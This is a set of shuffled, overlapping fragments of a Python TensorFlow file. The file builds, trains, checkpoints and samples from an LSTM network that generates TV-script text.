"tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state",
"{} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state =",
"<filename>tv-script-generation/full_test/neural_network.py import tensorflow as tf import timeit import datetime import numpy as np",
"initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word:",
"list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word,",
"or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i",
"final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn,",
"None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return",
"- 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0",
"import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets",
"self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n",
"rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') #",
"= sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time",
"so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far,",
"tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape =",
"' if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' '",
"in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else",
"state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch",
"rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return",
"save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not",
"sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for",
"- 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int,",
"seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per",
"sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver =",
"tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer =",
"tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\") print(tv_script)",
"print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int,",
"gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {}",
"return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size,",
"tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph):",
"feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far =",
"import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self):",
"def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches,",
"batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state:",
"= sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = {",
"= self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities",
"(p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell =",
"Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,",
"name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input,",
"= datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far)",
"tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained",
"= tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self,",
"= tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape",
"saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict,",
"self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs')",
"feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state,",
"= sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word)",
"epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]})",
"learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory",
"tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\")",
"p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length):",
"test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens",
"tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('(",
"batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver()",
"self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far)",
"y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed)",
"full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length,",
"(final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def",
"p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate",
"self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token",
"batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far",
"test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict,",
"input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state =",
"# Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) #",
"= {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i + 1,",
"{ self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ =",
"in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate}",
"range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length =",
"for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state =",
"% save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i",
"probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0],",
"estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1):",
"+ 1) if (epoch_i % test_every == 0 or epoch_i == num_epochs -",
"import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq",
"def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state",
"optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op",
"'{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to",
"key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script",
"= self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state",
"= last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far /",
"total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time",
"os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph,",
"name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data,",
"tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients",
"= [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length):",
"np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor,",
"= tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script =",
"def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count)",
"def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state,",
"def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None],",
"tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss',",
"* total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f},",
"return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length,",
"import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib",
"token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return",
"build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\")",
"gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self,",
"int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs",
"= ' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if",
"- total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to",
"batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state =",
"probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1],",
"epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess,",
"key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(),",
"[test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove",
"input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients =",
"epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory =",
"return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities)",
"num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every ==",
"from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None],",
"name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size,",
"tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script",
"full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and",
"(epoch_i % test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs",
"= '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved",
"= '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32,",
"tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self,",
"generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits,",
"batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets:",
"outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state)",
"prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state",
"get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data)",
"tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell,",
"self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran",
"x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state,",
"tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time",
"function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer",
"self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients",
"p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2):",
"def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number):",
"Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending =",
"enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss,",
"vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state",
"== num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every",
"test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations())",
"finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every",
"learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i)",
"np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def",
"build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state =",
"words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets,",
"self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op],",
"vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self,",
"if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' +",
"logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs",
"last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i",
"time so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss,",
"units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir):",
"seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) #",
"self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i",
"final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def",
"datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch",
"train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number)",
"1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all()",
"tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost)",
"self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state =",
"if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def",
"- all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i +",
"basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\")",
"{self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for",
"= self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size,",
"prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences)",
"= tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self,",
"last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish =",
"Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word =",
"/ (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so",
"_ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries,",
"= tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding",
"layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size,",
"1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab,",
"datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import",
"+ ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic",
"token in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"']",
"epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i == num_epochs",
"for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss(",
"len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0],",
"embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs):",
"return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir,",
"optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0,",
"import tensorflow as tf import timeit import datetime import numpy as np import",
"'\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor =",
"tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor =",
"embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self,",
"# Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state})",
"epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i %",
"1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or",
"seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences",
"embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn,",
"self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss",
"int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token in",
"ending = ' ' if key in ['\\n', '(', '\"'] else '' tv_script",
"input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected",
"test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])})",
"sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer()",
"graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir,",
"{}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state,",
"Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var",
"{self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x,",
"far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish))",
"with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':']",
"rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating",
"0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script =",
"tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def",
"self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i):",
"text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word +",
"test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess,",
"and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess,",
"in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs,",
"= tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size,",
"self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i)",
"# Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients =",
"n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]]",
"save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i +",
"def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding,",
"= tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self,",
"' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ',",
"token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else ''",
"== 0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script",
"trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab,",
"= tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size,",
